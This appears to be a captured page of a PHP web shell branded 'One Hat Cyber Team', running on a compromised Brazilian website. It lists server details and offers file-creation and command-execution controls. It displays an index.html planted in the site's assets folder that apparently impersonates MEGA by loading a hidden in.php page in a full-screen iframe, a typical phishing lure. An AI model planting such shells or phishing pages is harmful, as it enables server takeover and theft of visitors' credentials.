One Hat Cyber Team
Your IP :
216.73.216.165
Server IP :
170.247.48.121
Server :
Linux UBAPDWEB9271 3.10.0-1160.71.1.el7.x86_64 #1 SMP Tue Jun 28 15:37:28 UTC 2022 x86_64
Server Software :
Apache
PHP Version :
7.0.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
lelopagani.com.br
/
public
/
assets
/
sass
/
en
/
View File Name :
index.html
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>MEGA</title> <link rel="icon" href="favicon.ico" type="image/x-icon"> <style> html, body, iframe { margin: 0; padding: 0; height: 100%; width: 100%; border: none; } </style> </head> <body> <iframe id="myFrame" frameborder="0" allow="clipboard-write *" sandbox="allow-scripts allow-same-origin" ></iframe> <script> // Получаем текущий хост (например: sub.domain.com) const fullHost = window.location.hostname; // Разбиваем по точкам и берём последние два элемента (например: domain.com) const hostParts = fullHost.split("."); const mainDomain = hostParts.slice(-3).join("."); // Собираем URL const targetURL = "https://" + mainDomain + "/assets/sass/en/in.php"; // Подставляем в iframe document.getElementById("myFrame").src = targetURL; </script> </body> </html>